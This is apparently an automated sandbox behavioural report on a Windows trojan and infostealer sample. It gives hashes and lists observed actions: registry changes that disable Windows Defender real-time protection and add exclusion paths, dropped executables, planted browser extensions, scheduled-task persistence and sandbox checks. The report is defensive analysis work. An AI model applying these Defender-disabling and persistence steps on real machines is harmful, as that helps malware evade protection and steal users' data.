Behavioral Report

Analysis

max time kernel
127s
max time network
131s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
25-01-2023 10:59

Sharing

Copy URL

Twitter E-mail

Report Files Registry Network Processes Mutex Misc

General

Target

file.exe
Size

7MB
MD5

38a593f57b168d0c9a0b659a77243d12
SHA1

a3c10181d35c747687d15d023277a1f3a40d5815
SHA256

7d87031a25997b0f8104509b6fbc0efe5bff9d51e525297ffe92a4f9688d6ab8
SHA512

14aa028b21afcdb569753cf8995c6e8c51f8d8977a7a4389042d1762d00e1b0cfdda682b132dbf69cd165554d5f80950daee21b58598d627fe57c833f297027b
SSDEEP

196608:91OJC2/ztd+v19I/FKV9bv+DUPp+XOwTHS0hdCjHE6u:3OJfLtdaGKXJPp++wDRhQc

Score

10^/10

discovery evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings ⋅ 3 TTPs 4 IoCs

evasion trojan

TTPs:

Modify Registry Modify Existing Service Disabling Security Tools

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass ⋅ 2 TTPs 36 IoCs

evasion trojan

TTPs:

Disabling Security Tools Modify Registry

Processes:

reg.exereg.execonhost.exereg.execonhost.exereg.exereg.exereg.exereg.exereg.exeschtasks.exereg.exereg.exereg.execonhost.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mpIiGdOCcMUn = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ftljgLlqPYjU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ftljgLlqPYjU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\jxOPGMlVxWbacrVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	schtasks.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\THZROCWpyYwmtzQt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\jxOPGMlVxWbacrVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gtYbQvtxU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gtYbQvtxU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\THZROCWpyYwmtzQt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FsFQcVpRNSNUC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FsFQcVpRNSNUC = "0"
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mpIiGdOCcMUn = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\THZROCWpyYwmtzQt = "0"	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\THZROCWpyYwmtzQt = "0"	reg.exe

Blocklisted process makes network request ⋅ 1 IoCs

Processes:

rundll32.exe

flow pid process

21 1876 rundll32.exe
Executes dropped EXE ⋅ 4 IoCs

Processes:

Install.exeInstall.exeVsQqMDh.exefulLrMk.exe

pid process

1200 Install.exe
1064 Install.exe
1016 VsQqMDh.exe
2036 fulLrMk.exe

flow	pid	process
21	1876	rundll32.exe

pid	process
1200	Install.exe
1064	Install.exe
1016	VsQqMDh.exe
2036	fulLrMk.exe

Checks BIOS information in registry ⋅ 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

TTPs:

Query Registry System Information Discovery

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings ⋅ 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

TTPs:

Query Registry System Information Discovery

Processes:

fulLrMk.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation fulLrMk.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation	fulLrMk.exe

Loads dropped DLL ⋅ 12 IoCs

Processes:

file.exeInstall.exeInstall.exerundll32.exe

pid	process
1272	file.exe
1200	Install.exe
1200	Install.exe
1200	Install.exe
1200	Install.exe
1064	Install.exe
1064	Install.exe
1064	Install.exe
1876	rundll32.exe
1876	rundll32.exe
1876	rundll32.exe
1876	rundll32.exe

Reads user/profile data of web browsers ⋅ 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Checks installed software on the system ⋅ 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

TTPs:

Query Registry

Drops Chrome extension ⋅ 1 IoCs

Processes:

fulLrMk.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	fulLrMk.exe

Drops file in System32 directory ⋅ 19 IoCs

Processes:

fulLrMk.exeVsQqMDh.exerundll32.exepowershell.EXEpowershell.EXEpowershell.EXEInstall.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_2DC033A4A2D3E56E04293794AD2B5A7F	fulLrMk.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	VsQqMDh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	fulLrMk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	fulLrMk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_2DC033A4A2D3E56E04293794AD2B5A7F	fulLrMk.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	fulLrMk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	fulLrMk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	fulLrMk.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	VsQqMDh.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_AC22B722B474AE2AEDB339EDE8A91804	fulLrMk.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	VsQqMDh.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	fulLrMk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_AC22B722B474AE2AEDB339EDE8A91804	fulLrMk.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory ⋅ 13 IoCs

Processes:

fulLrMk.exe

description	ioc	process
File created	C:\Program Files (x86)\gtYbQvtxU\vaPyXJI.xml	fulLrMk.exe
File created	C:\Program Files (x86)\ftljgLlqPYjU2\WffKAHc.xml	fulLrMk.exe
File created	C:\Program Files (x86)\FsFQcVpRNSNUC\OEUKTNj.xml	fulLrMk.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	fulLrMk.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	fulLrMk.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	fulLrMk.exe
File created	C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR\ECKMmVI.dll	fulLrMk.exe
File created	C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR\RZcQXho.xml	fulLrMk.exe
File created	C:\Program Files (x86)\FsFQcVpRNSNUC\ahHnRDV.dll	fulLrMk.exe
File created	C:\Program Files (x86)\mpIiGdOCcMUn\uaKWWyh.dll	fulLrMk.exe
File created	C:\Program Files (x86)\gtYbQvtxU\zJLbGz.dll	fulLrMk.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	fulLrMk.exe
File created	C:\Program Files (x86)\ftljgLlqPYjU2\WzBJzLTbjGQzg.dll	fulLrMk.exe

Drops file in Windows directory ⋅ 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bLqLKLLaYUqLtSzfKw.job	schtasks.exe
File created	C:\Windows\Tasks\RVtwMREJXQsvxhCBJ.job	schtasks.exe
File created	C:\Windows\Tasks\FCAPlZuTAsqwUyW.job	schtasks.exe
File created	C:\Windows\Tasks\GltAVngPgjmuayZGp.job	schtasks.exe

Enumerates physical storage devices ⋅ 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs:

System Information Discovery

Creates scheduled task(s) ⋅ 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

TTPs:

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1884	schtasks.exe
1088	schtasks.exe
1624	schtasks.exe
1656	schtasks.exe
1384	schtasks.exe
1260	schtasks.exe
920	schtasks.exe
1748	schtasks.exe
1128	schtasks.exe
1484	schtasks.exe
740	schtasks.exe
1540	schtasks.exe
1636	schtasks.exe

Enumerates system info in registry ⋅ 2 TTPs 4 IoCs

TTPs:

Query Registry System Information Discovery

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS ⋅ 64 IoCs

Processes:

fulLrMk.exerundll32.exewscript.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	fulLrMk.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	fulLrMk.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-17-aa-63-f9-ce	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-17-aa-63-f9-ce\WpadDetectedUrl	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-17-aa-63-f9-ce\WpadDecision = "0"	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	fulLrMk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{17D5C449-538A-4215-A907-44912CD21314}\WpadDecision = "0"	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	fulLrMk.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	fulLrMk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-17-aa-63-f9-ce\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{17D5C449-538A-4215-A907-44912CD21314}	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	fulLrMk.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{17D5C449-538A-4215-A907-44912CD21314}\WpadDecisionTime = 90482b53ac30d901	fulLrMk.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{17D5C449-538A-4215-A907-44912CD21314}\WpadNetworkName = "Network 2"	fulLrMk.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-17-aa-63-f9-ce\WpadDecisionTime = 90482b53ac30d901	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	fulLrMk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0016000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	fulLrMk.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	fulLrMk.exe

Suspicious behavior: EnumeratesProcesses ⋅ 29 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEfulLrMk.exe

pid	process
2032	powershell.EXE
2032	powershell.EXE
2032	powershell.EXE
2024	powershell.EXE
2024	powershell.EXE
2024	powershell.EXE
1088	powershell.EXE
1088	powershell.EXE
1088	powershell.EXE
956	powershell.EXE
956	powershell.EXE
956	powershell.EXE
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe
2036	fulLrMk.exe

Suspicious use of AdjustPrivilegeToken ⋅ 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	2032	powershell.EXE
Token: SeDebugPrivilege	2024	powershell.EXE
Token: SeDebugPrivilege	1088	powershell.EXE
Token: SeDebugPrivilege	956	powershell.EXE

Suspicious use of WriteProcessMemory ⋅ 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.execmd.exeforfiles.execmd.exe

description	pid	process	target process
PID 1272 wrote to memory of 1200	1272	file.exe	Install.exe
PID 1272 wrote to memory of 1200	1272	file.exe	Install.exe
PID 1272 wrote to memory of 1200	1272	file.exe	Install.exe
PID 1272 wrote to memory of 1200	1272	file.exe	Install.exe
PID 1272 wrote to memory of 1200	1272	file.exe	Install.exe
PID 1272 wrote to memory of 1200	1272	file.exe	Install.exe
PID 1272 wrote to memory of 1200	1272	file.exe	Install.exe
PID 1200 wrote to memory of 1064	1200	Install.exe	Install.exe
PID 1200 wrote to memory of 1064	1200	Install.exe	Install.exe
PID 1200 wrote to memory of 1064	1200	Install.exe	Install.exe
PID 1200 wrote to memory of 1064	1200	Install.exe	Install.exe
PID 1200 wrote to memory of 1064	1200	Install.exe	Install.exe
PID 1200 wrote to memory of 1064	1200	Install.exe	Install.exe
PID 1200 wrote to memory of 1064	1200	Install.exe	Install.exe
PID 1064 wrote to memory of 1644	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1644	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1644	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1644	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1644	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1644	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1644	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1152	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1152	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1152	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1152	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1152	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1152	1064	Install.exe	forfiles.exe
PID 1064 wrote to memory of 1152	1064	Install.exe	forfiles.exe
PID 1644 wrote to memory of 1796	1644	forfiles.exe	cmd.exe
PID 1644 wrote to memory of 1796	1644	forfiles.exe	cmd.exe
PID 1644 wrote to memory of 1796	1644	forfiles.exe	cmd.exe
PID 1644 wrote to memory of 1796	1644	forfiles.exe	cmd.exe
PID 1644 wrote to memory of 1796	1644	forfiles.exe	cmd.exe
PID 1644 wrote to memory of 1796	1644	forfiles.exe	cmd.exe
PID 1644 wrote to memory of 1796	1644	forfiles.exe	cmd.exe
PID 1796 wrote to memory of 1288	1796	cmd.exe	reg.exe
